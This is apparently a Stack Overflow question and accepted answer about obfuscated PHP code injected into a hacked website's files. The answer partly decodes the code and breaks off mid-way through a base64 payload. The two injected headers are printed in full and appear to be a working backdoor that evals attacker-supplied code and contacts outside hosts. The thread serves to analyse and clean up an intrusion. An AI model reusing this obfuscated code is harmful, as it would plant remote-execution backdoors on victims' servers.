# How do I determine what this code does and if it might be malicious?

Tags: php

Recently my website went offline due to over-usage of server resources.

After getting it online again, I checked some files, and to my surprise each PHP file got a header like this (varying a little from file to file):

```
/*versio:2.12*/

$Q000=0;
$GLOBALS['Q000'] = '_cY3VybAq~pX2luaXQLIQYWxsb3dfdXJsX2ZvcGVu&fMQTZjjX3NldG9wdAX2V4ZWMxoUWXw_Y2xvc2UjKPGltZyBzcmM9Ig^hIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4lw@.SFRUUF9IT1NU%k;N@SMTI3Lg~MTAuXE^MTkyLjE2OC4JGGdw^A.orb3Nvbi5pbg)=Z2Fib3Iuc2UbCc2lsYmVyLmRldYPaGF2ZWFwb2tlLmNvbS5hdQKs.WV8BzgOgQiuZGlzcGxheV9lcnJvcnM_ZGV0ZXJtaW5hdG9yZnRwMTM$MMi4xMgUVFPMFEwT1FPUVEwwYU^ZYmFzZTY0X2RlY29kZQXDYmFzZTY0X2VuY29kZQu}aHR0cDovLwIiSFRUUF9VU0VSX0FHRU5U?BWdW5pb24tc2VsZWN0#GWHUkVRVUVTVF9VUkk^QU0NSSVBUX05BTUUudsHYUVVFUllfU1RSSU5HPwg nL3RtcC8QIt{wL3RtcADVE1QU{VVEVNUAVE1QRElSdXBsb2FkX3RtcF9kaXILgnadmVyc2lv&VJhLQfLXBocArFSFRUUF9FWEVDUEhQbb3V0W%PWb2s_Z=ToaHR0cAEpOi8vIY.L3BnLnBocD91PQK;}Jms9^JnQ9cGhwJnA9%TJnY9d$ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUlQxRlBUeWw3SUNSUlVWRXdVVkVnUFNCUk1EQlJNRTlQVVNneUxDQTJLVHNnSkZFd1QwOVJNQ0E5SUNSUlVWRXdVVkV1VVRBd1VUQlBUMUVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1VUQXdVVEJQVDFFb01qRXNJREl3S1NrZ1BUMGdVVEF3VVRCUFQxRW9ORE1zSURJcEtTQjdJQ1JKU1d4c2JHdzlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVVU5UlQwOHBPeUJ5WlhSMWNtNGdVVEF3VVRCUFQxRW9ORGNzSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUlJNRTlQVVRBcEtYc2dKRWxKTVVsc01TQTlJRUFrVVRCUFQxRXdLQ2s3SUNSSlNXeEpNV3dnUFNBa1VWRlJNRkZSTGxFd01GRXdUMDlSS0RRNUxDQXhNQ2s3SUNSUlVVOVJVVkVnUFNBa1VWRlJNRkZSTGxFd01GRXdUMDlSS0RVNUxDQTNLVHNnSkZFd1VVOVBNQ0E5SUNSUlVWRXdVVkV1VVRBd1VUQlBUMUVvTnpBc0lESXBMbEV3TUZFd1QwOVJLRGN6TENBM0tUc2dRQ1JKU1d4Sk1Xd29KRWxKTVVsc01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlVVOVJUMDhwT3lCQUpFbEpiRWt4YkNna1NVa3hTV3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrU1Vsc1NURnNLQ1JKU1RGSmJERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1NVbHNTVEZzS0NSSlNURkpiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tVVEF3VVRBd0lEMGdRQ1JSVVU5UlVWRW9KRWxKTVVsc01Ta3BJSHR5WlhSMWNtNGdVVEF3VVRCUFQxRW9ORGNzSURBcE8zMGdRQ1JSTUZGUFR6QW9KRWxKTVVsc01TazdJSEpsZEhWeWJpQlJNREJSTUU5UFVTZzBOeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCUk1EQlJNRTlQVVNnNE1pd2dNVFFwTGlSUlVVOVJUMDh1VVRBd1VUQlBUMUVvT1Rnc0lETTVLVHNnZlNCOUlHWjFibU4wYVc5dUlIVndaQ2drVVU4d1R6QlJMQ1JSVVU5UlQwOHBleUFrU1d3eE1URnNJRDBnUUdkbGRHaHZjM1JpZVc1aGJXVW9RQ1JmVTBWU1ZrVlNXMUV3TUZFd1QwOVJLREUwTVN3Z01USXBYU2s3SUdsbUlDZ2tTV3d4TVRGc0lDRTlQU0JSTURCUk1FOVBVU2cwTnl3Z01Da2dZVzVrSUhOMGNuQnZjeWdrU1d3eE1URnNMQ0JSTURCUk1FOVBVU2d4TlRrc0lEWXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKYkRFeE1Xd3NJRkV3TUZFd1QwOVJLREUyTml3Z05Da3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRWxzTVRFeGJDd2dVVEF3VVRCUFQxRW9NVGN6TENBeE1Ta3BJQ0U5UFNBd0tYc2dKRkV3VVZFd01EMUFabTl3Wlc0b0pGRlBNRTh3VVN4Uk1EQlJNRTlQVVNneE9EY3NJRElwS1RzZ1FHWmpiRzl6WlNna1VUQlJVVEF3S1RzZ2FXWWdLRUJwYzE5bWFXeGxLQ1JSVHpCUE1GRXBLWHNnZDNKcGRHVW9KRkZQTUU4d1VTd2daMlYwWm1sc1pTZ2tVVkZQVVU5UEtTazdJSDA3SUgwZ2ZTQWtVVkV3VVZGUElEMGdRWEp5WVhrb1VUQXdVVEJQVDFFb01UazBMQ0F4TUNrc0lGRXdNRkV3VDA5UktESXdOaXdnTVRFcExDQlJNREJSTUU5UFVTZ3lNVGtzSURFeUtTd2dVVEF3VVRCUFQxRW9Nak0wTENBeU1pa3BPeUFrU1VsSlNVbHNJRDBnSkZGUk1GRlJUMXN4WFRzZ1puVnVZM1JwYjI0Z2QzSnBkR1VvSkZGUE1FOHdVU3drVVU5UlVVOVBLWHNnYVdZZ0tDUkpNVEZzU1RFOVFHWnZjR1Z1S0NSUlR6QlBNRkVzVVRBd1VUQlBUMUVvTVRnM0xDQXlLU2twZXlCQVpuZHlhWFJsS0NSSk1URnNTVEVzSkZGUFVWRlBUeWs3SUVCbVkyeHZjMlVvSkVreE1XeEpNU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQnZkWFJ3ZFhRb0pFbHNNVEZKU1N3Z0pFbHNNVEV4TVNsN0lHVmphRzhnVVRBd1VUQlBUMUVvTWpVNUxDQXpLUzRrU1d3eE1VbEpMbEV3TUZFd1QwOVJLREkyTlN3Z01pa3VKRWxzTVRFeE1TNGlYSEpjYmlJN0lIMGdablZ1WTNScGIyNGdjR0Z5WVcwb0tYc2djbVYwZFhKdUlGRXdNRkV3VDA5UktEUTNMQ0F3S1RzZ2ZTQkFhVzVwWDNObGRDaFJNREJSTUU5UFVTZ3lOekFzSURFNUtTd2dNQ2s3SUdSbFptbHVaU2hSTURCUk1FOVBVU2d5T1RBc0lERTJLU3dnTVNrN0lDUkpNVEZzTVd3OVVUQXdVVEJQVDFFb016QTJMQ0EzS1RzZ0pFbEpTVEZKYkQxUk1EQlJNRTlQVVNnek1UVXNJRFlwT3lBa1VVOVJVVkV3UFZFd01GRXdUMDlSS0RNeU1Td2dNVFlwT3lBa1VWRlBVVTh3UFZFd01GRXdUMDlSS0RNME1pd2dNVGdwT3lBa1VWRXdVVTlQUFZFd01GRXdUMDlSS0RNMk1pd2dNVGdwT3lBa1VVOVBVVkZQUFZFd01GRXdUMDlSS0RNNE1pd2dNVEFwT3lBa1VVOVBVVkZQTGoxemRISjBiMnh2ZDJWeUtFQWtYMU5GVWxaRlVsdFJNREJSTUU5UFVTZ3hOREVzSURFeUtWMHBPeUFrU1RGSk1XeHNJRDBnUUNSZlUwVlNWa1ZTVzFFd01GRXdUMDlSS0RNNU5Dd2dNakFwWFRzZ1ptOXlaV0ZqYUNBb0pGOUhSVlFnWVhNZ0pFbHNNVEZKU1QwK0pFbHNNVEV4TVNsN0lHbG1JQ2h6ZEhKd2IzTW9KRWxzTVRFeE1TeFJNREJSTUU5UFVTZzBNVGNzSURjcEtTbDdKRjlIUlZSYkpFbHNNVEZKU1YwOVVUQXdVVEJQVDFFb05EY3NJREFwTzMwZ1pXeHpaV2xtSUNoemRISndiM01vSkVsc01URXhNU3hSTURCUk1FOVBVU2cwTWpVc0lEZ3BLU2w3SkY5SFJWUmJKRWxzTVRGSlNWMDlVVEF3VVRCUFQxRW9ORGNzSURBcE8zMGdmU0JwWmlnaGFYTnpaWFFvSkY5VFJWSldSVkpiVVRBd1VUQlBUMUVvTkRNM0xDQXhOU2xkS1NrZ2V5QWtYMU5GVWxaRlVsdFJNREJSTUU5UFVTZzBNemNzSURFMUtWMGdQU0JBSkY5VFJWSldSVkpiVVRBd1VUQlBUMUVvTkRVMExDQXhOU2xkT3lCcFppaEFKRjlUUlZKV1JWSmJVVEF3VVRCUFQxRW9ORGMwTENBeE5pbGRLU0I3SUNSZlUwVlNWa1ZTVzFFd01GRXdUMDlSS0RRek55d2dNVFVwWFNBdVBTQlJNREJSTUU5UFVTZzBPVEFzSURJcElDNGdRQ1JmVTBWU1ZrVlNXMUV3TUZFd1QwOVJLRFEzTkN3Z01UWXBYVHNnZlNCOUlHbG1JQ2drU1RGSk1VbHNQU1JSVDA5UlVVOHVRQ1JmVTBWU1ZrVlNXMUV3TUZFd1QwOVJLRFF6Tnl3Z01UVXBYU2w3SUNSUlQwOVJNRkU5UUcxa05TZ2tVVTlQVVZGUExpUkpTVWt4U1d3dVVFaFFYMDlUTGlSUlQxRlJVVEFwT3lBa1VWRlBNREF3UFZFd01GRXdUMDlSS0RRNU5Td2dOeWs3SUNSUlVUQlJUMUVnUFNCQmNuSmhlU2hSTURCUk1FOVBVU2cxTURjc0lEWXBMQ0JBSkY5VFJWSldSVkpiVVRBd1VUQlBUMUVvTlRFMExDQTBLVjBzSUVBa1gxTkZVbFpGVWx0Uk1EQlJNRTlQVVNnMU1qRXNJRFlwWFN3Z1FDUmZSVTVXVzFFd01GRXdUMDlSS0RVeE5Dd2dOQ2xkTENCQUpGOUZUbFpiVVRBd1VUQlBUMUVvTlRJM0xDQTRLVjBzSUVBa1gwVk9WbHRSTURCUk1FOVBVU2cxTWpFc0lEWXBYU3dnUUdsdWFWOW5aWFFvVVRBd1VUQlBUMUVvTlRNMUxDQXhPU2twS1RzZ1ptOXlaV0ZqYUNBb0pGRlJNRkZQVVNCaGN5QWtTVWt4TVVreEtYc2dhV1lnS0NGbGJYQjBlU2drU1VreE1Va3hLU2w3SUNSSlNURXhTVEV1UFVSSlVrVkRWRTlTV1Y5VFJWQkJVa0ZVVDFJN0lHbG1JQ2hBYVhOZmQzSnBkR0ZpYkdVb0pFbEpNVEZKTVNrcGV5QWtVVkZQTURBd0lEMGdKRWxKTVRGSk1Uc2dZbkpsWVdzN0lIMGdmU0I5SUNSMGJYQTlKRkZSVHpBd01DNVJNREJSTUU5UFVTZzFOVFFzSURJcExpUlJUMDlSTUZFN0lHbG1JQ2hBSkY5VFJWSldSVkpiSWtoVVZGQmZXVjlCVlZSSUlsMDlQU1JSVDA5Uk1GRXBleUJsWTJodklDSmNjbHh1SWpzZ1FHOTFkSEIxZENoUk1EQlJNRTlQVVNnMU5UZ3NJRGdwTENBa1NVbEpNVWxzTGxFd01GRXdUMDlSS0RVM01Dd2dNaWt1SkVreE1Xd3hiQzVSTURCUk1FOVBVU2cxTnpNc0lEWXBLVHNnYVdZZ0tDUlJNREJSVDA4OUpGRlJUMUZQTUNoQUpGOVRSVkpXUlZKYlVUQXdVVEJQVDFFb05UZ3hMQ0F4TmlsZEtTbDdJRUJsZG1Gc0tDUlJNREJSVDA4cE95QmxZMmh2SUNKY2NseHVJanNnUUc5MWRIQjFkQ2hSTURCUk1FOVBVU2cxT1Rnc0lEUXBMQ0JSTURCUk1FOVBVU2cyTURZc0lETXBLVHNnZlNCbGVHbDBLREFwT3lCOUlHbG1JQ2hBYVhOZlptbHNaU2drZEcxd0tTbDdJRUJwYm1Oc2RXUmxYMjl1WTJVb0pIUnRjQ2s3SUgwZ1pXeHpaWHNnSkVreFNURkpiRDFBZFhKc1pXNWpiMlJsS0NSSk1Va3hTV3dwT3lCMWNHUW9KSFJ0Y0N4Uk1EQlJNRTlQVVNnMk1UUXNJRFlwTGxFd01GRXdUMDlSS0RZeU1pd2dOQ2t1SkZGUk1GRlJUMXN3WFM1Uk1EQlJNRTlQVVNnMk1qa3NJREUwS1M0a1NURkpNVWxzTGxFd01GRXdUMDlSS0RZME5pd2dOQ2t1SkZGUFQxRXdVUzVSTURCUk1FOVBVU2cyTlRFc0lERXlLUzRrU1RFeGJERnNMbEV3TUZFd1QwOVJLRFkyTlN3Z05Da3VKRWxKU1RGSmJDazdJSDBnZlNCOSIpKTsXZJcHJlZ19yZXBsYWNlsm~6261736536345f6465636f6465';

if (!function_exists('Q00Q0OOQ'))
    {
        function Q00Q0OOQ($a, $b)
            {
            $c=$GLOBALS['Q000'];
            $d=pack('H*',substr($c, -26));
            return $d(substr($c, $a, $b));
            }
    };

    $IIllIIIIl = Q00Q0OOQ(6493, 16);
    $IIllIIIIl("/QQOOOQOOQ/e", Q00Q0OOQ(671, 5819), "QQOOOQOOQ");
?>
```

Another header:

```
/*versio:2.12*/
$QQQQ=0;
$GLOBALS['QQQQ'] = 'IaY3VybAiX2luaXQs(NYWxsb3dfdXJsX2ZvcGVuMQ?uEbi%X3NldG9wdAX2V4ZWMrgXwNY2xvc2UMPBPGltZyBzcmM9IgU?IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4SFRUUF9IT1NUFMTI3LgFUpXr%MTAuCcMTkyLjE2OC4PRtdwGY!}* b3Nvbi5pbgsZ2Fib3Iuc2Uc2lsYmVyLmRlaGF2ZWFwb2tlLmNvbS5hdQOdg}WV8OgkerZGlzcGxheV9lcnJvcnMXs~ZGV0ZXJtaW5hdG9yYZnRwMTMMi4xMgDWBUVFPMFEwT1FPUVEwvZGYmFzZTY0X2RlY29kZQLZzYmFzZTY0X2VuY29kZQKh?aHR0cDovLwIFSFRUUF9VU0VSX0FHRU5U&ZdW5pb24BJ^c2VsZWN0HoAUkVRVUVTVF9VUkkU0NSSVBUX05BTUUjbEUVVFUllfU1RSSU5HamRPwVL3RtcC8L$AL3RtcA#bVE1Qv^iVEVNUAKxVE1QRElSbdXBsb2FkX3RtcF9kaXIkyDLgxSgdmVyc2lvTzQLQnULXBocAHZ$SFRUUF9FWEVDUEhQyu}LQb3V0qWb2s&FAaHR0cAoOi8vdKFL3BnLnBocD91PQ%M?PJms9daJnQ9cGhwJnA9VJnY9CZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUlVUQlJVU2w3SUNSSk1Xd3hiREVnUFNCUlVWRXdVVEJQTUNneUxDQTJLVHNnSkZFd1VUQXdVU0E5SUNSSk1Xd3hiREV1VVZGUk1GRXdUekFvT1N3Z055azdJR2xtSUNoQWFXNXBYMmRsZENoUlVWRXdVVEJQTUNneE9Td2dNakFwS1NBOVBTQlJVVkV3VVRCUE1DZ3pPU3dnTWlrcElIc2dKRWt4TVd4c01UMUFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KRkZSVVRCUlVTazdJSEpsZEhWeWJpQlJVVkV3VVRCUE1DZzBOeXdnTUNrN0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb0pGRXdVVEF3VVNrcGV5QWtTVEV4TVVsc0lEMGdRQ1JSTUZFd01GRW9LVHNnSkVsc2JHeHNiQ0E5SUNSSk1Xd3hiREV1VVZGUk1GRXdUekFvTkRjc0lERXdLVHNnSkZGUFQwOHdUeUE5SUNSSk1Xd3hiREV1VVZGUk1GRXdUekFvTlRjc0lEY3BPeUFrVVRBd1R6QlJJRDBnSkVreGJERnNNUzVSVVZFd1VUQlBNQ2cyTml3Z01pa3VVVkZSTUZFd1R6QW9OamtzSURjcE95QkFKRWxzYkd4c2JDZ2tTVEV4TVVsc0xDQkRWVkpNVDFCVVgxVlNUQ3dnSkZGUlVUQlJVU2s3SUVBa1NXeHNiR3hzS0NSSk1URXhTV3dzSUVOVlVreFBVRlJmU0VWQlJFVlNMR1poYkhObEtUc2dRQ1JKYkd4c2JHd29KRWt4TVRGSmJDd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl4MGNuVmxLVHNnUUNSSmJHeHNiR3dvSkVreE1URkpiQ3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDdzFLVHNnYVdZZ0tDUkpNVEZzTVVrZ1BTQkFKRkZQVDA4d1R5Z2tTVEV4TVVsc0tTa2dlM0psZEhWeWJpQlJVVkV3VVRCUE1DZzBOeXdnTUNrN2ZTQkFKRkV3TUU4d1VTZ2tTVEV4TVVsc0tUc2djbVYwZFhKdUlGRlJVVEJSTUU4d0tEUTNMQ0F3S1RzZ2ZTQmxiSE5sSUhzZ2NtVjBkWEp1SUZGUlVUQlJNRTh3S0RjNUxDQXhOQ2t1SkZGUlVUQlJVUzVSVVZFd1VUQlBNQ2c1TlN3Z016a3BPeUI5SUgwZ1puVnVZM1JwYjI0Z2RYQmtLQ1JSTUZFd01FOHNKRkZSVVRCUlVTbDdJQ1JSVVRCUFQwOGdQU0JBWjJWMGFHOXpkR0o1Ym1GdFpTaEFKRjlUUlZKV1JWSmJVVkZSTUZFd1R6QW9NVE0wTENBeE1pbGRLVHNnYVdZZ0tDUlJVVEJQVDA4Z0lUMDlJRkZSVVRCUk1FOHdLRFEzTENBd0tTQmhibVFnYzNSeWNHOXpLQ1JSVVRCUFQwOHNJRkZSVVRCUk1FOHdLREUwTnl3Z05pa3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkZSTUU5UFR5d2dVVkZSTUZFd1R6QW9NVFU1TENBMEtTa2dJVDA5SURBZ1lXNWtJSE4wY25CdmN5Z2tVVkV3VDA5UExDQlJVVkV3VVRCUE1DZ3hOalVzSURFeEtTa2dJVDA5SURBcGV5QWtTV3hzYkd3eFBVQm1iM0JsYmlna1VUQlJNREJQTEZGUlVUQlJNRTh3S0RFM09Td2dNaWtwT3lCQVptTnNiM05sS0NSSmJHeHNiREVwT3lCcFppQW9RR2x6WDJacGJHVW9KRkV3VVRBd1R5a3BleUIzY21sMFpTZ2tVVEJSTURCUExDQm5aWFJtYVd4bEtDUlJVVkV3VVZFcEtUc2dmVHNnZlNCOUlDUkpiR3hKTVRFZ1BTQkJjbkpoZVNoUlVWRXdVVEJQTUNneE9EY3NJREV3S1N3Z1VWRlJNRkV3VHpBb01UazRMQ0F4TVNrc0lGRlJVVEJSTUU4d0tESXdPU3dnTVRJcExDQlJVVkV3VVRCUE1DZ3lNakVzSURJeUtTazdJQ1JSTUU5UE1GRWdQU0FrU1d4c1NURXhXekZkT3lCbWRXNWpkR2x2YmlCM2NtbDBaU2drVVRCUk1EQlBMQ1JKTVRGSmJHd3BleUJwWmlBb0pGRlBNRTh3TUQxQVptOXdaVzRvSkZFd1VUQXdUeXhSVVZFd1VUQlBNQ2d4Tnprc0lESXBLU2w3SUVCbWQzSnBkR1VvSkZGUE1FOHdNQ3drU1RFeFNXeHNLVHNnUUdaamJHOXpaU2drVVU4d1R6QXdLVHNnZlNCOUlHWjFibU4wYVc5dUlHOTFkSEIxZENna1VVOHdVVTh3TENBa1NVbHNiREV4S1hzZ1pXTm9ieUJSVVZFd1VUQlBNQ2d5TkRjc0lETXBMaVJSVHpCUlR6QXVVVkZSTUZFd1R6QW9NalV3TENBeUtTNGtTVWxzYkRFeExpSmNjbHh1SWpzZ2ZTQm1kVzVqZEdsdmJpQndZWEpoYlNncGV5QnlaWFIxY200Z1VWRlJNRkV3VHpBb05EY3NJREFwT3lCOUlFQnBibWxmYzJWMEtGRlJVVEJSTUU4d0tESTFOU3dnTVRrcExDQXdLVHNnWkdWbWFXNWxLRkZSVVRCUk1FOHdLREkzTnl3Z01UWXBMQ0F4S1RzZ0pFa3hiREZzYkQxUlVWRXdVVEJQTUNneU9UUXNJRGNwT3lBa1VVOVJNREJSUFZGUlVUQlJNRTh3S0RNd01Td2dOaWs3SUNSUlR6QlJVVEE5VVZGUk1GRXdUekFvTXpFd0xDQXhOaWs3SUNSUlQxRXdVVTg5VVZGUk1GRXdUekFvTXpJNUxDQXhPQ2s3SUNSSmJERkpiREU5VVZGUk1GRXdUekFvTXpVd0xDQXhPQ2s3SUNSSmJERnNTVWs5VVZGUk1GRXdUekFvTXpjeExDQXhNQ2s3SUNSSmJERnNTVWt1UFhOMGNuUnZiRzkzWlhJb1FDUmZVMFZTVmtWU1cxRlJVVEJSTUU4d0tERXpOQ3dnTVRJcFhTazdJQ1JSVHpCUk1FOGdQU0JBSkY5VFJWSldSVkpiVVZGUk1GRXdUekFvTXpnekxDQXlNQ2xkT3lCbWIzSmxZV05vSUNna1gwZEZWQ0JoY3lBa1VVOHdVVTh3UFQ0a1NVbHNiREV4S1hzZ2FXWWdLSE4wY25CdmN5Z2tTVWxzYkRFeExGRlJVVEJSTUU4d0tEUXdOU3dnTnlrcEtYc2tYMGRGVkZza1VVOHdVVTh3WFQxUlVWRXdVVEJQTUNnME55d2dNQ2s3ZlNCbGJITmxhV1lnS0hOMGNuQnZjeWdrU1Vsc2JERXhMRkZSVVRCUk1FOHdLRFF4TlN3Z09Da3BLWHNrWDBkRlZGc2tVVTh3VVU4d1hUMVJVVkV3VVRCUE1DZzBOeXdnTUNrN2ZTQjlJR2xtS0NGcGMzTmxkQ2drWDFORlVsWkZVbHRSVVZFd1VUQlBNQ2cwTWpZc0lERTFLVjBwS1NCN0lDUmZVMFZTVmtWU1cxRlJVVEJSTUU4d0tEUXlOaXdnTVRVcFhTQTlJRUFrWDFORlVsWkZVbHRSVVZFd1VUQlBNQ2cwTkRFc0lERTFLVjA3SUdsbUtFQWtYMU5GVWxaRlVsdFJVVkV3VVRCUE1DZzBOVGtzSURFMktWMHBJSHNnSkY5VFJWSldSVkpiVVZGUk1GRXdUekFvTkRJMkxDQXhOU2xkSUM0OUlGRlJVVEJSTUU4d0tEUTNPQ3dnTWlrZ0xpQkFKRjlUUlZKV1JWSmJVVkZSTUZFd1R6QW9ORFU1TENBeE5pbGRPeUI5SUgwZ2FXWWdLQ1JSVVU4d1QxRTlKRWxzTVd4SlNTNUFKRjlUUlZKV1JWSmJVVkZSTUZFd1R6QW9OREkyTENBeE5TbGRLWHNnSkZFd1VUQlJVVDFBYldRMUtDUkpiREZzU1VrdUpGRlBVVEF3VVM1UVNGQmZUMU11SkZGUE1GRlJNQ2s3SUNSSlNXeEpNVEU5VVZGUk1GRXdUekFvTkRneExDQTNLVHNnSkVsc01Va3hTU0E5SUVGeWNtRjVLRkZSVVRCUk1FOHdLRFE1TVN3Z05pa3NJRUFrWDFORlVsWkZVbHRSVVZFd1VUQlBNQ2cwT1Rrc0lEUXBYU3dnUUNSZlUwVlNWa1ZTVzFGUlVUQlJNRTh3S0RVd05pd2dOaWxkTENCQUpGOUZUbFpiVVZGUk1GRXdUekFvTkRrNUxDQTBLVjBzSUVBa1gwVk9WbHRSVVZFd1VUQlBNQ2cxTVRRc0lEZ3BYU3dnUUNSZlJVNVdXMUZSVVRCUk1FOHdLRFV3Tml3Z05pbGRMQ0JBYVc1cFgyZGxkQ2hSVVZFd1VUQlBNQ2cxTWpNc0lERTVLU2twT3lCbWIzSmxZV05vSUNna1NXd3hTVEZKSUdGeklDUlJUMDh3TURBcGV5QnBaaUFvSVdWdGNIUjVLQ1JSVDA4d01EQXBLWHNnSkZGUFR6QXdNQzQ5UkVsU1JVTlVUMUpaWDFORlVFRlNRVlJQVWpzZ2FXWWdLRUJwYzE5M2NtbDBZV0pzWlNna1VVOVBNREF3S1NsN0lDUkpTV3hKTVRFZ1BTQWtVVTlQTURBd095QmljbVZoYXpzZ2ZTQjlJSDBnSkhSdGNEMGtTVWxzU1RFeExsRlJVVEJSTUU4d0tEVTBOU3dnTWlrdUpGRXdVVEJSVVRzZ2FXWWdLRUFrWDFORlVsWkZVbHNpU0ZSVVVGOVpYMEZWVkVnaVhUMDlKRkV3VVRCUlVTbDdJR1ZqYUc4Z0lseHlYRzRpT3lCQWIzVjBjSFYwS0ZGUlVUQlJNRTh3S0RVMU1Dd2dPQ2tzSUNSUlQxRXdNRkV1VVZGUk1GRXdUekFvTlRZeExDQXlLUzRrU1RGc01XeHNMbEZSVVRCUk1FOHdLRFUyTlN3Z05pa3BPeUJwWmlBb0pGRlBVVkZSVVQwa1VVOVJNRkZQS0VBa1gxTkZVbFpGVWx0UlVWRXdVVEJQTUNnMU56UXNJREUyS1YwcEtYc2dRR1YyWVd3b0pGRlBVVkZSVVNrN0lHVmphRzhnSWx4eVhHNGlPeUJBYjNWMGNIVjBLRkZSVVRCUk1FOHdLRFU1TlN3Z05Da3NJRkZSVVRCUk1FOHdLRFl3TVN3Z015a3BPeUI5SUdWNGFYUW9NQ2s3SUgwZ2FXWWdLRUJwYzE5bWFXeGxLQ1IwYlhBcEtYc2dRR2x1WTJ4MVpHVmZiMjVqWlNna2RHMXdLVHNnZlNCbGJITmxleUFrVVZGUE1FOVJQVUIxY214bGJtTnZaR1VvSkZGUlR6QlBVU2s3SUhWd1pDZ2tkRzF3TEZGUlVUQlJNRTh3S0RZd055d2dOaWt1VVZGUk1GRXdUekFvTmpFMExDQTBLUzRrU1d4c1NURXhXekJkTGxGUlVUQlJNRTh3S0RZeU1Td2dNVFFwTGlSUlVVOHdUMUV1VVZGUk1GRXdUekFvTmpNNUxDQTBLUzRrVVRCUk1GRlJMbEZSVVRCUk1FOHdLRFkwTlN3Z01USXBMaVJKTVd3eGJHd3VVVkZSTUZFd1R6QW9OalU0TENBMEtTNGtVVTlSTURCUktUc2dmU0I5SUgwPSIpKTsnC&cHJlZ19yZXBsYWNlz (6261736536345f6465636f6465';

if (!function_exists('QQQ0Q0O0')) {
    function QQQ0Q0O0($a, $b){
        $c=$GLOBALS['QQQQ'];
        $d=pack('H*',substr($c, -26));
        return $d(substr($c, $a, $b));
    }
};

$IIIllIlll = QQQ0Q0O0(6485, 16);
$IIIllIlll("/II1lIllIl/e", QQQ0Q0O0(663, 5819), "II1lIllIl");
?>
```

How would I go about figuring out what this code actually does and if it is a threat to my website? What does it mean for me if it turns out to be malicious code; what should I do?

Comment: **Note:** This question is being [discussed on Meta](http://meta.stackexchange.com/questions/201557/is-asking-to-identify-hack-code-on-topic).

Comment: Have just answered another question ( http://stackoverflow.com/questions/20095387/my-server-was-hacked-a-encoded-code-was-injected-i-was-not-able-to-know-what-wa ) about a newer version of this script... I decoded the whole script and looked what it did. I also explained how I did it, so you might your version in a similar way. So you can maybe find out if it does exactly the same..

Comment: This PHP "virus" is why I left wordpress (built on PHP). My site was hacked even though I'd closed the loopholes and kept it updated.  Quite annoying.

Answer (score 42, accepted):

Well you definitely got hacked.

**Go to the end to view the analysis. Look for bullet points.**

It sets up a global variable, `Q000` and then registers a function that grabs that global, takes the last 26 characters of it (which turn out be `base64_decode` when you look them up in an ascii table by hex value). Then it `pack`s base 64 encoded "base64_decode" into a hex string (`H*`). Finally it returns a base 64 decoded substring.

This all has the effect of defining Q00Q0OOQ to be a function that substrings and then decodes the global variable. This global variable is obfuscated as well, as the botnet knows where the useful parts start and end. The rest of the global variable is junk.

I found this when base 64 decoding that global:

@p/tmpTUQ5@TT\Y\fW'6I-php
HTTP_EXECPHPmcokNGG/pg.php?u=I

There's a lot more in there. It is used by the deobfuscated code below to get function names, paths, etc...
`HTTP_EXECPHP` is one part, as is `/pg.php?u=I`

`$IIllIIIIl = Q00Q0OOQ(6493, 16);`
gets
`preg_replace`

`$IIllIIIIl("/QQOOOQOOQ/e", Q00Q0OOQ(671, 5819), "QQOOOQOOQ");` gets this code...

```
eval(base64_decode("aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJFFRT1FPTyl7ICRRUVEwUVEgPSBRMDBRME9PUSgyLCA2KTsgJFEwT09RMCA9ICRRUVEwUVEuUTAwUTBPT1EoMTEsIDcpOyBpZiAoQGluaV9nZXQoUTAwUTBPT1EoMjEsIDIwKSkgPT0gUTAwUTBPT1EoNDMsIDIpKSB7ICRJSWxsbGw9QGZpbGVfZ2V0X2NvbnRlbnRzKCRRUU9RT08pOyByZXR1cm4gUTAwUTBPT1EoNDcsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRRME9PUTApKXsgJElJMUlsMSA9IEAkUTBPT1EwKCk7ICRJSWxJMWwgPSAkUVFRMFFRLlEwMFEwT09RKDQ5LCAxMCk7ICRRUU9RUVEgPSAkUVFRMFFRLlEwMFEwT09RKDU5LCA3KTsgJFEwUU9PMCA9ICRRUVEwUVEuUTAwUTBPT1EoNzAsIDIpLlEwMFEwT09RKDczLCA3KTsgQCRJSWxJMWwoJElJMUlsMSwgQ1VSTE9QVF9VUkwsICRRUU9RT08pOyBAJElJbEkxbCgkSUkxSWwxLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkSUlsSTFsKCRJSTFJbDEsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkSUlsSTFsKCRJSTFJbDEsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkUTAwUTAw